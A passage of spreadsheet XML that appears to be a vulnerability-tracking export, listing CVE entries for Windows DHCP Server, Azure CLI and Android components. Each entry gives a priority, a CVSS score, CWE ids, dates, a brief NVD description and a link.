          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="S405" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83948</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr">
        <is>
          <t>microsoft:vm_repair</t>
        </is>
      </c>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S406" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0065</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S407" s="5" t="inlineStr">
        <is>
          <t>In areBackgroundActivityStartsAllowed of BackgroundLaunchProcessController.java, there is a possible unintended way to launch activities in the background due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0065</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0084</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S408" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of HostEmulationManager.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0084</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28572</t>
        </is>
      </c>
      <c r="D409" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F409" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L409" s="5" t="inlineStr"/>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t>In onCreate of InstallLaunch.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28572</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28583</t>
        </is>
      </c>
      <c r="D410" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F410" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr"/>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t>In validate_camera_metadata_structure of camera_metadata.c, there is a possible out of bounds write due to a logical error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28583</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28590</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr"/>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible improper encryption key validation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28590</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28593</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr"/>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-356</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>In getItemList of SettingsFragment.java, there is a possible user interaction bypass due to misleading or insufficient UI. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28593</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28594</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28594</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28599</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>In addCreatorToken of ActivityManagerService.java, there is a possible Intent Redirection Bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28599</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28600</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>In onCreate of PaymentDefaultDialog.java, there is a possible way to change default payment app due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28600</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28602</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>In setClipboardAccessNotificationsEnabledForUser of ClipboardService.java, there is a possible mult-iuser isolation due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28602</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28603</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>In assertSafeToStartCustomActivity of AppRestrictionsFragment.java, there is a possible read/write access to private files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28603</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28607</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>In multiple functions in multiple locations, there is a possible background activity launch bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28611</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L419" s="5" t="inlineStr"/>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of NfcService.java, there is a possible silent payment session hijacking enablement due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28612</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>In resolveActivity of ActivityStarter.java, there is a possible way to perform Intent Redirection attacks due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28614</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
